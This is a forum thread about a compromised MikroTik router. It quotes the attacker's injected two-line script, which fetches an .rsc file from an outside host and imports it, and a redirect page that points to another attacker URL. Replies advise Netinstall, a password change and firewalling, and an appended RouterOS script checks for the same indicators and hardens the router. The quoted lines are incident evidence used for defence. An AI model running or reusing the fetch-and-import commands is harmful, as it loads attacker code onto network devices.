hi,
One of our routers was hacked and the following script was added:
/tool fetch url=http://zancetom.com/poll/8e39cd78-78ec-4361-b86a-7794dc7ccbe8 mode=http dst-path=7wmp0b4s.rsc
/import 7wmp0b4s.rsc
No VLAN or VPNs were created, but my IP SOCKS was enabled and had 200 connections.
My firmware was 6.48.2 which I thought was not vulnerable to this hack.
Is there any way to find out what this was supposed to do?
Thanks.
Post the script content here and let’s see what there is, because I don’t want to go to that website to find out.
306 Days ago: https://www.reddit.com/r/mikrotik/comments/ixrday/got_hacked_and_a_rsc_file_was_downloaded_to_my/
<html><head><meta http-equiv="refresh" content="0;url=http://searchguide.level3.com/search/?q=http://gamedate.xyz%2Fpoll%2F7c8c30a0-e932-4a1e-8f03-623d9c04df79&t=0&bc="/></head><body><script type="text/javascript">window.location="http://searchguide.level3.com/search/?q="+escape(window.location)+"&r="+escape(document.referrer)+"&t=0&bc=+"&r="+escape(document.referrer)+"&t=0&bc=)";</script></body></html>
179 Days ago: https://www.reddit.com/r/mikrotik/comments/l65fur/found_a_vpn_interface_and_scheduled_script_in_my/
Jotne
July 26, 2021, 5:18am
4
There is only one solution to fix this and that is Netinstall. https://wiki.mikrotik.com/wiki/Manual:Netinstall
Removing the config is not enough.
pe1chl
July 26, 2021, 9:01am
5
And also:
change the password
make sure your router config interface (telnet, ssh, webfig, winbox, api) is NOT accessible from internet (using firewall)
The default firewall after a recent RouterOS install on “home routers” (not CCR, RB1100 etc) will be fine.
Note that updating RouterOS does not change the firewall, so when you had a very old install and merely updated it, you could still have a bad firewall.
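The cleanup and firewall advice in this thread, written out as a RouterOS terminal script. This is an added example, not something any poster supplied; it assumes ether1 is the internet-facing interface, the LAN is 192.168.88.0/24, and the password value is a placeholder you replace. Run it from a console or Winbox terminal after a Netinstall, before reconnecting the router to the internet.

```routeros
# --- 1. Look for the indicators described in this thread ---
# A scheduler entry or script that fetches and imports an .rsc file,
# an unexpected .rsc file on disk, or SOCKS unexpectedly enabled.
/system scheduler print detail
/system script print detail
/file print where name~"\\.rsc\$"
/ip socks print

# --- 2. Close what the attacker was using ---
/ip socks set enabled=no
/ip socks access remove [find]
/user set [find name="admin"] password="<new-strong-password>"

# --- 3. Keep management services off the internet ---
# Disable plaintext/unneeded services; bind the rest to the LAN subnet.
/ip service set telnet disabled=yes
/ip service set ftp disabled=yes
/ip service set www disabled=yes
/ip service set api disabled=yes
/ip service set api-ssl disabled=yes
/ip service set ssh address=192.168.88.0/24
/ip service set winbox address=192.168.88.0/24

# --- 4. Input-chain firewall: only the LAN may reach the router itself ---
# Assumption: ether1 is the WAN port. The interface list lets the rules
# survive later port changes without rewriting them.
/interface list add name=WAN comment="internet-facing ports"
/interface list member add list=WAN interface=ether1
/ip firewall filter add chain=input action=accept \
    connection-state=established,related,untracked \
    comment="accept replies to traffic the router started"
/ip firewall filter add chain=input action=drop connection-state=invalid
/ip firewall filter add chain=input action=accept in-interface-list=!WAN \
    comment="management (ssh/winbox/webfig) only from LAN"
/ip firewall filter add chain=input action=drop in-interface-list=WAN \
    comment="everything else from the internet is dropped"

# Verify: the drop rule should be last and its packet counter should
# start climbing once the WAN port is connected.
/ip firewall filter print stats chain=input
```

The "updating RouterOS does not change the firewall" point above is why step 4 is explicit: on an upgraded old install these rules will not exist until you add them.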